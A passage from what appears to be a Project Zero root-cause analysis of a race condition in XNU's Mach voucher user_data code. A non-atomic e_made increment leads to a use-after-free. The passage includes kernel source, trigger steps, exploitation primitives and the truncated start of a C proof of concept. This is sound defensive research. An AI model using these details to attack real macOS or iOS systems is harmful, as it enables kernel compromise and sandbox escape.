        save_val_index = iv_lookup(voucher, key_index);

This point is important for getting a good feeling for how the voucher code is supposed to work; recipes can refer not only to other vouchers (via the previous_voucher port) but they can also refer to themselves during creation. You don't have to have just one sub-recipe per attr type for which you wish to have a value in your voucher; you can specify multiple sub-recipes for that type. Does it actually make any sense to do that? Well, luckily for the security researcher we don't have to worry about whether functionality actually makes any sense; it's all just a weird machine to us! (There's allusions in the code to future functionality where attribute values can be "layered" or "linked" but for now such functionality doesn't exist.)

iv_lookup returns the "value index" for the given key in the particular voucher. That means it just returns the iv_index_t in the iv_table of the given voucher:

static inline iv_index_t

iv_lookup(ipc_voucher_t iv, iv_index_t key_index)

{

        if (key_index < iv->iv_table_size) {

                return iv->iv_table[key_index];

        }

        return IV_UNUSED_VALINDEX;

}

This value index uniquely identifies an existing attribute value, but you need to ask the attribute's controller for the actual value. Before getting that previous value though, the code first determines whether this sub-recipe might be trying to refer to the value currently stored by this voucher or has explicitly passed in a previous_voucher. The value in the previous voucher takes precedence over whatever is already in the under-construction voucher.

        prev_val_index = (IV_NULL != prev_voucher) ?

            iv_lookup(prev_voucher, key_index) :

            save_val_index;

Then the code looks up the actual previous value to operate on:

        ivace_lookup_values(key_index, prev_val_index,

            previous_vals, &previous_vals_count);

key_index is the key we're operating on, MACH_VOUCHER_ATTR_KEY_USER_DATA in this example. This function is called ivace_lookup_values (note the plural). There are some comments in the voucher code indicating that maybe in the future values could themselves be put into a linked-list such that you could have larger values (or layered/chained values.) But this functionality isn't implemented; ivace_lookup_values will only ever return 1 value.

Here's ivace_lookup_values:

static void

ivace_lookup_values(

        iv_index_t                              key_index,

        iv_index_t                              value_index,

        mach_voucher_attr_value_handle_array_t          values,

        mach_voucher_attr_value_handle_array_size_t     *count)

{

        ipc_voucher_attr_control_t ivac;

        ivac_entry_t ivace;

        if (IV_UNUSED_VALINDEX == value_index ||

            MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN <= key_index) {

                *count = 0;

                return;

        }

        ivac = iv_global_table[key_index].ivgte_control;

        assert(IVAC_NULL != ivac);

        /*

         * Get the entry and then the linked values.

         */

        ivac_lock(ivac);

        assert(value_index < ivac->ivac_table_size);

        ivace = &ivac->ivac_table[value_index];

        /*

         * TODO: support chained values (for effective vouchers).

         */

        assert(ivace->ivace_refs > 0);

        values[0] = ivace->ivace_value;

        ivac_unlock(ivac);

        *count = 1;

}

The locking used in the vouchers code is very important for properly understanding the underlying vulnerability when we eventually get there, but for now I'm glossing over it and we'll return to examine the relevant locks when necessary.

Let's discuss the ivace_lookup_values code. They index the iv_global_table to get a pointer to the attribute type's controller:

        ivac = iv_global_table[key_index].ivgte_control;

They take that controller's lock then index its ivac_table to find that value's struct ivac_entry_s and read the ivace_value value from there:

        ivac_lock(ivac);

        assert(value_index < ivac->ivac_table_size);

        ivace = &ivac->ivac_table[value_index];

        assert(ivace->ivace_refs > 0);

        values[0] = ivace->ivace_value;

        ivac_unlock(ivac);

        *count = 1;

Let's go back to the calling function (ipc_replace_voucher_value) and keep reading:

        /* Call out to resource manager to get new value */

        new_value_voucher = IV_NULL;

        kr = (ivam->ivam_get_value)(

                ivam, key, command,

                previous_vals, previous_vals_count,

                content, content_size,

                &new_value, &new_flag, &new_value_voucher);

        if (KERN_SUCCESS != kr) {

                ivac_release(ivac);

                return kr;

        }

ivam->ivam_get_value is calling the attribute type's function pointer which defines the meaning for the particular type of "get_value". The term get_value here is a little confusing; aren't we trying to store a new value? (and there's no subsequent call to a method like "store_value".) A better way to think about the semantics of get_value is that it's meant to evaluate both previous_vals (either the value from previous_voucher or the value currently in this voucher) and content (the arbitrary byte buffer from this sub-recipe) and combine/evaluate them to create a value representation. It's then up to the controller layer to store/cache that value. (Actually there's one tedious snag in this system which we'll get to involving locking...)

ivam_get_value for the user_data attribute type is user_data_get_value:

static kern_return_t

user_data_get_value(

        ipc_voucher_attr_manager_t                      __assert_only manager,

        mach_voucher_attr_key_t                         __assert_only key,

        mach_voucher_attr_recipe_command_t              command,

        mach_voucher_attr_value_handle_array_t          prev_values,

        mach_voucher_attr_value_handle_array_size_t     prev_value_count,

        mach_voucher_attr_content_t                     content,

        mach_voucher_attr_content_size_t                content_size,

        mach_voucher_attr_value_handle_t                *out_value,

        mach_voucher_attr_value_flags_t                 *out_flags,

        ipc_voucher_t                                   *out_value_voucher)

{

        user_data_element_t elem;

        assert(&user_data_manager == manager);

        USER_DATA_ASSERT_KEY(key);

        /* never an out voucher */

        *out_value_voucher = IPC_VOUCHER_NULL;

        *out_flags = MACH_VOUCHER_ATTR_VALUE_FLAGS_NONE;

        switch (command) {

        case MACH_VOUCHER_ATTR_REDEEM:

                /* redeem of previous values is the value */

                if (0 < prev_value_count) {

                        elem = (user_data_element_t)prev_values[0];

                        assert(0 < elem->e_made);

                        elem->e_made++;

                        *out_value = prev_values[0];

                        return KERN_SUCCESS;

                }

                /* redeem of default is default */

                *out_value = 0;

                return KERN_SUCCESS;

        case MACH_VOUCHER_ATTR_USER_DATA_STORE:

                if (USER_DATA_MAX_DATA < content_size) {

                        return KERN_RESOURCE_SHORTAGE;

                }

                /* empty is the default */

                if (0 == content_size) {

                        *out_value = 0;

                        return KERN_SUCCESS;

                }

                elem = user_data_dedup(content, content_size);

                *out_value = (mach_voucher_attr_value_handle_t)elem;

                return KERN_SUCCESS;

        default:

                /* every other command is unknown */

                return KERN_INVALID_ARGUMENT;

        }

}

Let's look at the MACH_VOUCHER_ATTR_USER_DATA_STORE case, which is the command we put in our single sub-recipe. (The vulnerability is in the MACH_VOUCHER_ATTR_REDEEM code above but we need a lot more background before we get to that.) In the MACH_VOUCHER_ATTR_USER_DATA_STORE case the input arbitrary byte buffer is passed to user_data_dedup, then that return value is returned as the value of out_value. Here's user_data_dedup:

static user_data_element_t

user_data_dedup(

        mach_voucher_attr_content_t                     content,

        mach_voucher_attr_content_size_t                content_size)

{

        iv_index_t sum;

        iv_index_t hash;

        user_data_element_t elem;

        user_data_element_t alloc = NULL;

        sum = user_data_checksum(content, content_size);

        hash = USER_DATA_HASH_BUCKET(sum);

retry:

        user_data_lock();

        queue_iterate(&user_data_bucket[hash], elem, user_data_element_t, e_hash_link) {

                assert(elem->e_hash == hash);

                /* if sums match... */

                if (elem->e_sum == sum && elem->e_size == content_size) {

                        iv_index_t i;

                        /* and all data matches */

                        for (i = 0; i < content_size; i++) {

                                if (elem->e_data[i] != content[i]) {

                                        break;

                                }

                        }

                        if (i < content_size) {

                                continue;

                        }

                        /* ... we found a match... */

                        elem->e_made++;

                        user_data_unlock();

                        if (NULL != alloc) {

                                kfree(alloc, sizeof(*alloc) + content_size);

                        }

                        return elem;

                }

        }

        if (NULL == alloc) {

                user_data_unlock();

                alloc = (user_data_element_t)kalloc(sizeof(*alloc) + content_size);

                alloc->e_made = 1;

                alloc->e_size = content_size;

                alloc->e_sum = sum;

                alloc->e_hash = hash;

                memcpy(alloc->e_data, content, content_size);

                goto retry;

        }

        queue_enter(&user_data_bucket[hash], alloc, user_data_element_t, e_hash_link);

        user_data_unlock();

        return alloc;

}

The user_data attributes are just uniquified buffer pointers. Each buffer is represented by a user_data_value_element structure, which has a meta-data header followed by a variable-sized inline buffer containing the arbitrary byte data:

struct user_data_value_element {

        mach_voucher_attr_value_reference_t     e_made;

        mach_voucher_attr_content_size_t        e_size;

        iv_index_t                              e_sum;

        iv_index_t                              e_hash;

        queue_chain_t                           e_hash_link;

        uint8_t                                 e_data[];

};

Pointers to those elements are stored in the user_data_bucket hash table.

user_data_dedup searches the user_data_bucket hash table to see if a matching user_data_value_element already exists. If not, it allocates one and adds it to the hash table. Note that it's not allowed to hold locks while calling kalloc() so the code first has to drop the user_data lock, allocate a user_data_value_element then take the lock again and check the hash table a second time to ensure that another thread didn't also allocate and insert a matching user_data_value_element while the lock was dropped.

The e_made field of user_data_value_element is critical to the vulnerability we're eventually going to discuss, so let's examine its use here.

If a new user_data_value_element is created its e_made field is initialized to 1. If an existing user_data_value_element is found which matches the requested content buffer the e_made field is incremented before a pointer to that user_data_value_element is returned. Redeeming a user_data_value_element (via the MACH_VOUCHER_ATTR_REDEEM command) also just increments the e_made of the element being redeemed before returning it. The type of the e_made field is mach_voucher_attr_value_reference_t so it's tempting to believe that this field is a reference count. The reality is more subtle than that though.

The first hint that e_made isn't exactly a reference count is that if you search for e_made in XNU you'll notice that it's never decremented. There are also no places where a pointer to that structure is cast to another type which treats the first dword as a reference count. e_made can only ever go up (well technically there's also nothing stopping it overflowing so it can also go down 1 in every 232 increments...)

Let's go back up the stack to the caller of user_data_get_value, ipc_replace_voucher_value:

The next part is again code for unused functionality. No current voucher attr type implementations return a new_value_voucher so this condition is never true:

        /* TODO: value insertion from returned voucher */

        if (IV_NULL != new_value_voucher) {

                iv_release(new_value_voucher);

        }

Next, the code needs to wrap new_value in an ivace_entry and determine the index of that ivace_entry in the controller's table of values. This is done by ivace_reference_by_value:

        /*

         * Find or create a slot in the table associated

         * with this attribute value.  The ivac reference

         * is transferred to a new value, or consumed if

         * we find a matching existing value.

         */

        val_index = ivace_reference_by_value(ivac, new_value, new_flag);

        iv_set(voucher, key_index, val_index);

/*

 * Look up the values for a given <key, index> pair.

 *

 * Consumes a reference on the passed voucher control.

 * Either it is donated to a newly-created value cache

 * or it is released (if we piggy back on an existing

 * value cache entry).

 */

static iv_index_t

ivace_reference_by_value(

        ipc_voucher_attr_control_t      ivac,

        mach_voucher_attr_value_handle_t        value,

        mach_voucher_attr_value_flags_t          flag)

{

        ivac_entry_t ivace = IVACE_NULL;

        iv_index_t hash_index;

        iv_index_t index;

        if (IVAC_NULL == ivac) {

                return IV_UNUSED_VALINDEX;

        }

        ivac_lock(ivac);

restart:

        hash_index = IV_HASH_VAL(ivac->ivac_init_table_size, value);

        index = ivac->ivac_table[hash_index].ivace_index;

        while (index != IV_HASH_END) {

                assert(index < ivac->ivac_table_size);

                ivace = &ivac->ivac_table[index];

                assert(!ivace->ivace_free);

                if (ivace->ivace_value == value) {

                        break;

                }

                assert(ivace->ivace_next != index);

                index = ivace->ivace_next;

        }

        /* found it? */

        if (index != IV_HASH_END) {

                /* only add reference on non-persistent value */

                if (!ivace->ivace_persist) {

                        ivace->ivace_refs++;

                        ivace->ivace_made++;

                }

                ivac_unlock(ivac);

                ivac_release(ivac);

                return index;

        }

        /* insert new entry in the table */

        index = ivac->ivac_freelist;

        if (IV_FREELIST_END == index) {

                /* freelist empty */

                ivac_grow_table(ivac);

                goto restart;

        }

        /* take the entry off the freelist */

        ivace = &ivac->ivac_table[index];

        ivac->ivac_freelist = ivace->ivace_next;

        /* initialize the new entry */

        ivace->ivace_value = value;

        ivace->ivace_refs = 1;

        ivace->ivace_made = 1;

        ivace->ivace_free = FALSE;

        ivace->ivace_persist = (flag & MACH_VOUCHER_ATTR_VALUE_FLAGS_PERSIST) ? TRUE : FALSE;

        /* insert the new entry in the proper hash chain */

        ivace->ivace_next = ivac->ivac_table[hash_index].ivace_index;

        ivac->ivac_table[hash_index].ivace_index = index;

        ivac_unlock(ivac);

        /* donated passed in ivac reference to new entry */

        return index;

}

You'll notice that this code has a very similar structure to user_data_dedup; it needs to do almost exactly the same thing. Under a lock (this time the controller's lock) traverse a hash table looking for a matching value. If one can't be found, allocate a new entry and put the value in the hash table. The same unlock/lock dance is needed, but not every time because ivace's are kept in a table of struct ivac_entry_s's so the lock only needs to be dropped if the table needs to grow.

If a new entry is allocated (from the freelist of ivac_entry's in the table) then its reference count (ivace_refs) is set to 1, and its ivace_made count is set to 1. If an existing entry is found then both its ivace_refs and ivace_made counts are incremented:

                        ivace->ivace_refs++;

                        ivace->ivace_made++;

Finally, the index of this entry in the table of all the controller's entries is returned, because it's the index into that table which a voucher stores; not a pointer to the ivace.

ivace_reference_by_value then calls iv_set to store that index into the correct slot in the voucher's iv_table, which is just a simple array index operation:

        iv_set(voucher, key_index, val_index);

static void

iv_set(ipc_voucher_t iv,

    iv_index_t key_index,

    iv_index_t value_index)

{

        assert(key_index < iv->iv_table_size);

        iv->iv_table[key_index] = value_index;

}

Our journey following this recipe is almost over! Since we only supplied one sub-recipe we exit the loop in host_create_mach_voucher and reach the call to iv_dedup:

        if (KERN_SUCCESS == kr) {

                *new_voucher = iv_dedup(voucher);

I won't show the code for iv_dedup here because it's again structurally almost identical to the two other levels of deduping we've examined. In fact it's a little simpler because it can hold the associated hash table lock the whole time (via ivht_lock()) since it doesn't need to allocate anything. If a match is found (that is, the hash table already contains a voucher with exactly the same set of value indexes) then a reference is taken on that existing voucher and a reference is dropped on the voucher we just created from the input recipe via iv_dealloc:

iv_dealloc(new_iv, FALSE);

The FALSE argument here indicates that new_iv isn't in the ivht_bucket hashtable so shouldn't be removed from there if it is going to be destroyed. Vouchers are only added to the hashtable after the deduping process to prevent deduplication happening against incomplete vouchers.

The final step occurs when host_create_mach_voucher returns. Since this is a MIG method, if it returns success and new_voucher isn't IV_NULL, new_voucher will be converted into a mach port; a send right to which will be given to the userspace caller. This is the final level of deduplication; there can only ever be one mach port representing a particular voucher. This is implemented by the voucher structure's iv_port member.

(For the sake of completeness note that there are actually two userspace interfaces to host_create_mach_voucher; the host port MIG method and also the host_create_mach_voucher_trap mach trap. The trap interface has to emulate the MIG semantics though.)

Destruction

Although I did briefly hint at a vulnerability above we still haven't actually seen enough code to determine that that bug actually has any security consequences. This is where things get complicated ;-)

Let's start with the result of the situation we described above, where we created a voucher port with the following recipe:

struct udata_dword_recipe {

  mach_voucher_attr_recipe_data_t recipe;

  uint32_t payload;

};

struct udata_dword_recipe r = {0};

r.recipe.key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

r.recipe.command = MACH_VOUCHER_ATTR_USER_DATA_STORE;

r.recipe.content_size = sizeof(uint32_t);

r.payload = 0x41414141;

This will end up with the following data structures in the kernel:

voucher_port {

  ip_kobject = reference-counted pointer to the voucher

}

voucher {

  iv_refs = 1;

  iv_table[6] = reference-counted *index* into user_data controller's ivac_table

}

controller {

  ivace_table[index] =

    {

      ivace_refs = 1;

      ivace_made = 1;

      ivace_value = pointer to user_data_value_element

    }

}

user_data_value_element {

  e_made = 1;

  e_data[] = {0x41, 0x41, 0x41, 0x41}

}

Let's look at what happens when we drop the only send right to the voucher port and the voucher gets deallocated.

We'll skip analysis of the mach port part; essentially, once all the send rights to the mach port holding a reference to the voucher are deallocated iv_release will get called to drop its reference on the voucher. And if that was the last reference iv_release calls iv_dealloc and we'll pick up the code there:

void

iv_dealloc(ipc_voucher_t iv, boolean_t unhash)

iv_dealloc removes the voucher from the hash table, destroys the mach port associated with the voucher (if there was one) then releases a reference on each value index in the iv_table:

        for (i = 0; i < iv->iv_table_size; i++) {

                ivace_release(i, iv->iv_table[i]);

        }

Recall that the index in the iv_table is the "key index", which is one less than the key, which is why i is being passed to ivace_release. The value in iv_table alone is meaningless without knowing under which index it was stored in the iv_table. Here's the start of ivace_release:

static void

ivace_release(

        iv_index_t key_index,

        iv_index_t value_index)

{

...

        ivgt_lookup(key_index, FALSE, &ivam, &ivac);

        ivac_lock(ivac);

        assert(value_index < ivac->ivac_table_size);

        ivace = &ivac->ivac_table[value_index];

        assert(0 < ivace->ivace_refs);

        /* cant release persistent values */

        if (ivace->ivace_persist) {

                ivac_unlock(ivac);

                return;

        }

        if (0 < --ivace->ivace_refs) {

                ivac_unlock(ivac);

                return;

        }

First they grab references to the attribute manager and controller for the given key index (ivam and ivac), take the ivac lock then take calculate a pointer into the ivac's ivac_table to get a pointer to the ivac_entry corresponding to the value_index to be released.

If this entry is marked as persistent, then nothing happens, otherwise the ivace_refs field is decremented. If the reference count is still non-zero, they drop the ivac's lock and return. Otherwise, the reference count of this ivac_entry has gone to zero and they will continue on to "free" the ivac_entry. As noted before, this isn't going to free the ivac_entry to the zone allocator; the entry is just an entry in an array and in its free state its index is present in a freelist of empty indexes. The code continues thus:

        key = iv_index_to_key(key_index);

        assert(MACH_VOUCHER_ATTR_KEY_NONE != key);

        /*

         * if last return reply is still pending,

         * let it handle this later return when

         * the previous reply comes in.

         */

        if (ivace->ivace_releasing) {

                ivac_unlock(ivac);

                return;

        }

        /* claim releasing */

        ivace->ivace_releasing = TRUE;

iv_index_to_key goes back from the key_index to the key value (which in practice will be 1 greater than the key index.) Then the ivace_entry is marked as "releasing". The code continues:

        value = ivace->ivace_value;

redrive:

        assert(value == ivace->ivace_value);

        assert(!ivace->ivace_free);

        made = ivace->ivace_made;

        ivac_unlock(ivac);

        /* callout to manager's release_value */

        kr = (ivam->ivam_release_value)(ivam, key, value, made);

        /* recalculate entry address as table may have changed */

        ivac_lock(ivac);

        ivace = &ivac->ivac_table[value_index];

        assert(value == ivace->ivace_value);

        /*

         * new made values raced with this return.  If the

         * manager OK'ed the prior release, we have to start

         * the made numbering over again (pretend the race

         * didn't happen). If the entry has zero refs again,

         * re-drive the release.

         */

        if (ivace->ivace_made != made) {

                if (KERN_SUCCESS == kr) {

                        ivace->ivace_made -= made;

                }

                if (0 == ivace->ivace_refs) {

                        goto redrive;

                }

                ivace->ivace_releasing = FALSE;

                ivac_unlock(ivac);

                return;

        } else {

Note that we enter this snippet with the ivac's lock held. The ivace->ivace_value and ivace->ivace_made values are read under that lock, then the ivac lock is dropped and the attribute managers release_value callback is called:

        kr = (ivam->ivam_release_value)(ivam, key, value, made);

Here's the user_data ivam_release_value callback:

static kern_return_t

user_data_release_value(

        ipc_voucher_attr_manager_t              __assert_only manager,

        mach_voucher_attr_key_t                 __assert_only key,

        mach_voucher_attr_value_handle_t        value,

        mach_voucher_attr_value_reference_t     sync)

{

        user_data_element_t elem;

        iv_index_t hash;

        assert(&user_data_manager == manager);

        USER_DATA_ASSERT_KEY(key);

        elem = (user_data_element_t)value;

        hash = elem->e_hash;

        user_data_lock();

        if (sync == elem->e_made) {

                queue_remove(&user_data_bucket[hash], elem, user_data_element_t, e_hash_link);

                user_data_unlock();

                kfree(elem, sizeof(*elem) + elem->e_size);

                return KERN_SUCCESS;

        }

        assert(sync < elem->e_made);

        user_data_unlock();

        return KERN_FAILURE;

}

Under the user_data lock (via user_data_lock()) the code checks whether the user_data_value_element's e_made field is equal to the sync value passed in. Looking back at the caller, sync is ivace->ivace_made. If and only if those values are equal does this method remove the user_data_value_element from the hashtable and free it (via kfree) before returning success. If sync isn't equal to e_made, this method returns KERN_FAILURE.

Having looked at the semantics of user_data_free_value let's look back at the callsite:

redrive:

        assert(value == ivace->ivace_value);

        assert(!ivace->ivace_free);

        made = ivace->ivace_made;

        ivac_unlock(ivac);

        /* callout to manager's release_value */

        kr = (ivam->ivam_release_value)(ivam, key, value, made);

        /* recalculate entry address as table may have changed */

        ivac_lock(ivac);

        ivace = &ivac->ivac_table[value_index];

        assert(value == ivace->ivace_value);

        /*

         * new made values raced with this return.  If the

         * manager OK'ed the prior release, we have to start

         * the made numbering over again (pretend the race

         * didn't happen). If the entry has zero refs again,

         * re-drive the release.

         */

        if (ivace->ivace_made != made) {

                if (KERN_SUCCESS == kr) {

                        ivace->ivace_made -= made;

                }

                if (0 == ivace->ivace_refs) {

                        goto redrive;

                }

                ivace->ivace_releasing = FALSE;

                ivac_unlock(ivac);

                return;

        } else {

They grab the ivac's lock again and recalculate a pointer to the ivace (because the table could have been reallocated while the ivac lock was dropped, and only the index into the table would be valid, not a pointer.)

Then things get really weird; if ivace->ivace_made isn't equal to made but user_data_release_value did return KERN_SUCCESS, then they subtract the old value of ivace_made from the current value of ivace_made, and if ivace_refs is 0, they use a goto statement to try to free the user_data_value_element again?

If that makes complete sense to you at first glance then give yourself a gold star! Because to me at first that logic was completely impenetrable. We will get to the bottom of it though.

We need to ask the question: under what circumstances will ivace_made and the user_data_value_element's e_made field ever be different? To answer this we need to look back at ipc_voucher_replace_value where the user_data_value_element and ivace are actually allocated:

        kr = (ivam->ivam_get_value)(

                ivam, key, command,

                previous_vals, previous_vals_count,

                content, content_size,

                &new_value, &new_flag, &new_value_voucher);

        if (KERN_SUCCESS != kr) {

                ivac_release(ivac);

                return kr;

        }

... /* WINDOW */

        val_index = ivace_reference_by_value(ivac, new_value, new_flag);

We already looked at this code; if you can't remember what ivam_get_value or ivace_reference_by_value are meant to do, I'd suggest going back and looking at those sections again.

Firstly, ipc_voucher_replace_value itself isn't holding any locks. It does however hold a few references (e.g., on the ivac and ivam.)

user_data_get_value (the value of ivam->ivam_get_value) only takes the user_data lock (and not in all paths; we'll get to that) and ivace_reference_by_value, which increments ivace->ivace_made does that under the ivac lock.

e_made should therefore always get incremented before any corresponding ivace's ivace_made field. And there is a small window (marked as WINDOW above) where e_made will be larger than the ivace_made field of the ivace which will end up with a pointer to the user_data_value_element. If, in exactly that window shown above, another thread grabs the ivac's lock and drops the last reference (ivace_refs) on the ivace which currently points to that user_data_value_element then we'll encounter one of the more complex situations outlined above where, in ivace_release ivace_made is not equal to the user_data_value_element's e_made field. The reason that there is special treatment of that case is that it's indicating that there is a live pointer to the user_data_value_element which isn't yet accounted for by the ivace, and therefore it's not valid to free the user_data_value_element.

Another way to view this is that it's a hack around not holding a lock across that window shown above.

With this insight we can start to unravel the "redrive" logic:

        if (ivace->ivace_made != made) {

                if (KERN_SUCCESS == kr) {

                        ivace->ivace_made -= made;

                }

                if (0 == ivace->ivace_refs) {

                        goto redrive;

                }

                ivace->ivace_releasing = FALSE;

                ivac_unlock(ivac);

                return;

        } else {

                /*

                 * If the manager returned FAILURE, someone took a

                 * reference on the value but have not updated the ivace,

                 * release the lock and return since thread who got

                 * the new reference will update the ivace and will have

                 * non-zero reference on the value.

                 */

                if (KERN_SUCCESS != kr) {

                        ivace->ivace_releasing = FALSE;

                        ivac_unlock(ivac);

                        return;

                }

        }

Let's take the first case:

made is the value of ivace->ivace_made before the ivac's lock was dropped and re-acquired. If those are different, it indicates that a race did occur and another thread (or threads) revived this ivace (since even though the refs has gone to zero it hasn't yet been removed by this thread from the ivac's hash table, and even though it's been marked as being released by setting ivace_releasing to TRUE, that doesn't prevent another reference being handed out on a racing thread.)

There are then two distinct sub-cases:

1) (ivace->ivace_made != made) and (KERN_SUCCESS == kr)

We can now parse the meaning of this: this ivace was revived but that occurred after the user_data_value_element was freed on this thread. The racing thread then allocated a *new* value which happened to be exactly the same as the ivace_value this ivace has, hence the other thread getting a reference on this ivace before this thread was able to remove it from the ivac's hash table. Note that for the user_data case the ivace_value is a pointer (making this particular case even more unlikely, but not impossible) but it isn't going to always be the case that the value is a pointer; at the ivac layer the ivace_value is actually a 64-bit handle. The user_data attr chooses to store a pointer there.

So what's happened in this case is that another thread has looked up an ivace for a new ivace_value which happens to collide (due to having a matching pointer, but potentially different buffer contents) with the value that this thread had. I don't think this actually has security implications; but it does take a while to get your head around.

If this is the case then we've ended up with a pointer to a revived ivace which now, despite having a matching ivace_value, is never-the-less semantically different from the ivace we had when this thread entered this function. The connection between our thread's idea of ivace_made and the ivace_value's e_made has been severed; and we need to remove our thread's contribution to that; hence:

        if (ivace->ivace_made != made) {

                if (KERN_SUCCESS == kr) {

                        ivace->ivace_made -= made;

                }

2) (ivace->ivace_made != made) and (0 == ivace->ivace_refs)

In this case another thread (or threads) has raced, revived this ivace and then deallocated all their references. Since this thread set ivace_releasing to TRUE the racing thread, after decrementing ivace_refs back to zero encountered this:

        if (ivace->ivace_releasing) {

                ivac_unlock(ivac);

                return;

        }

and returned early from ivace_release, despite having dropped ivace_refs to zero, and it's now this thread's responsibility to continue freeing this ivace:

                if (0 == ivace->ivace_refs) {

                        goto redrive;

                }

You can see the location of the redrive label in the earlier snippets; it captures a new value from ivace_made before calling out to the attr manager again to try to free the ivace_value.

If we don't goto redrive then this ivace has been revived and is still alive, therefore all that needs to be done is set ivace_releasing to FALSE and return.

The conditions under which the other branch is taken is nicely documented in a comment. This is the case when ivace_made is equal to made, yet ivam_release_value didn't return success (so the ivace_value wasn't freed.)

                /*

                 * If the manager returned FAILURE, someone took a

                 * reference on the value but have not updated the ivace,

                 * release the lock and return since thread who got

                 * the new reference will update the ivace and will have

                 * non-zero reference on the value.

                 */

In this case, the code again just sets ivace_releasing to FALSE and continues.

Put another way, this comment explaining is exactly what happens when the racing thread was exactly in the region marked WINDOW up above, which is after that thread had incremented e_made on the same user_data_value_element which this ivace has a pointer to in its ivace_value field, but before that thread had looked up this ivace and taken a reference. That's exactly the window another thread needs to hit where it's not correct for this thread to free its user_data_value_element, despite our ivace_refs being 0.

The bug

Hopefully the significance of the user_data_value_element e_made field is now clear. It's not exactly a reference count; in fact it only exists as a kind of band-aid to work around what should be in practice a very rare race condition. But, if its value was wrong, bad things could happen if you tried :)

e_made is only modified in two places: Firstly, in user_data_dedup when a matching user_data_value_element is found in the user_data_bucket hash table:

                        /* ... we found a match... */

                        elem->e_made++;

                        user_data_unlock();

The only other place is in user_data_get_value when handling the MACH_VOUCHER_ATTR_REDEEM command during recipe parsing:

        switch (command) {

        case MACH_VOUCHER_ATTR_REDEEM:

                /* redeem of previous values is the value */

                if (0 < prev_value_count) {

                        elem = (user_data_element_t)prev_values[0];

                        assert(0 < elem->e_made);

                        elem->e_made++;

                        *out_value = prev_values[0];

                        return KERN_SUCCESS;

                }

                /* redeem of default is default */

                *out_value = 0;

                return KERN_SUCCESS;

As mentioned before, it's up to the attr managers themselves to define the semantics of redeeming a voucher; the entirety of the user_data semantics for voucher redemption are shown above. It simply returns the previous value, with e_made incremented by 1. Recall that *prev_value is either the value which was previously in this under-construction voucher for this key, or the value in the prev_voucher referenced by this sub-recipe.

If you can't spot the bug above in the user_data MACH_VOUCHER_ATTR_REDEEM code right away that's because it's a bug of omission; it's what's not there that causes the vulnerability, namely that the increment in the MACH_VOUCHER_ATTR_REDEEM case isn't protected by the user_data lock! This increment isn't atomic.

That means that if the MACH_VOUCHER_ATTR_REDEEM code executes in parallel with either itself on another thread or the elem->e_made++ increment in user_data_dedup on another thread, the two threads can both see the same initial value for e_made, both add one then both write the same value back; incrementing it by one when it should have been incremented by two.

But remember, e_made isn't a reference count! So actually making something bad happen isn't as simple as just getting the two threads to align such that their increments overlap so that e_made is wrong.

Let's think back to what the purpose of e_made is: it exists solely to ensure that if thread A drops the last ref on an ivace whilst thread B is exactly in the race window shown below, that thread doesn't free new_value on thread B's stack:

        kr = (ivam->ivam_get_value)(

                ivam, key, command,

                previous_vals, previous_vals_count,

                content, content_size,

                &new_value, &new_flag, &new_value_voucher);

        if (KERN_SUCCESS != kr) {

                ivac_release(ivac);

                return kr;

        }

... /* WINDOW */

        val_index = ivace_reference_by_value(ivac, new_value, new_flag);

And the reason the user_data_value_element doesn't get freed by thread A is because in that window, e_made will always be larger than the ivace->ivace_made value for any ivace which has a pointer to that user_data_value_element. e_made is larger because the e_made increment always happens before any ivace_made increment.

This is why the absolute value of e_made isn't important; all that matters is whether or not it's equal to ivace_made. And the only purpose of that is to determine whether there's another thread in that window shown above.

So how can we make something bad happen? Well, let's assume that we successfully trigger the e_made non-atomic increment and end up with a value of e_made which is one less than ivace_made. What does this do to the race window detection logic? It completely flips it! If, in the steady-state e_made is one less than ivace_made then we race two threads; thread A which is dropping the last ivace_ref and thread B which is attempting to revive it and thread B is in the WINDOW shown above then e_made gets incremented before ivace_made, but since e_made started out one lower than ivace_made (due to the successful earlier trigger of the non-atomic increment) then e_made is now exactly equal to ivace_made; the exact condition which indicates we cannot possibly be in the WINDOW shown above, and it's safe to free the user_data_value_element which is in fact live on thread B's stack!

Thread B then ends up with a revived ivace with a dangling ivace_value.

This gives an attacker two primitives that together would be more than sufficient to successfully exploit this bug: the mach_voucher_extract_attr_content voucher port MIG method would allow reading memory through the dangling ivace_value pointer, and deallocating the voucher port would allow a controlled extra kfree of the dangling pointer.

With the insight that you need to trigger these two race windows (the non-atomic increment to make e_made one too low, then the last-ref vs revive race) it's trivial to write a PoC to demonstrate the issue; simply allocate and deallocate voucher ports on two threads, with at least one of them using a MACH_VOUCHER_ATTR_REDEEM sub-recipe command. Pretty quickly you'll hit the two race conditions correctly.

Conclusions

It's interesting to think about how this vulnerability might have been found. Certainly somebody did find it, and trying to figure out how they might have done that can help us improve our vulnerability research techniques. I'll offer four possibilities:

1) Just read the code

Possible, but this vulnerability is quite deep in the code. This would have been a marathon auditing effort to find and determine that it was exploitable. On the other hand this attack surface is reachable from every sandbox making vulnerabilities here very valuable and perhaps worth the investment.

2) Static lock-analysis tooling

This is something which we've discussed within Project Zero over many afternoon coffee chats: could we build a tool to generate a fuzzy mapping between locks and objects which are probably meant to be protected by those locks, and then list any discrepancies where the lock isn't held? In this particular case e_made is only modified in two places; one time the user_data_lock is held and the other time it isn't. Perhaps tooling isn't even required and this could just be a technique used to help guide auditing towards possible race-condition vulnerabilities.

3) Dynamic lock-analysis tooling

Perhaps tools like ThreadSanitizer could be used to dynamically record a mapping between locks and accessed objects/object fields. Such a tool could plausibly have flagged this race condition under normal system use. The false positive rate of such a tool might be unusably high however.

4) Race-condition fuzzer

It's not inconceivable that a coverage-guided fuzzer could have generated the proof-of-concept shown below, though it would specifically have to have been built to execute parallel testcases.

As to what technique was actually used, we don't know. As defenders we need to do a better job making sure that we invest even more effort in all of these possibilities and more.

PoC:

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

#include <pthread.h>

#include <mach/mach.h>

#include <mach/mach_voucher.h>

#include <atm/atm_types.h>

#include <voucher/ipc_pthread_priority_types.h>

// @i41nbeer

static mach_port_t

create_voucher_from_recipe(void* recipe, size_t recipe_size) {

    mach_port_t voucher = MACH_PORT_NULL;

    kern_return_t kr = host_create_mach_voucher(

            mach_host_self(),

            (mach_voucher_attr_raw_recipe_array_t)recipe,

            recipe_size,

            &voucher);

    if (kr != KERN_SUCCESS) {

        printf("failed to create voucher from recipe\n");

    }

    return voucher;

}

static void*

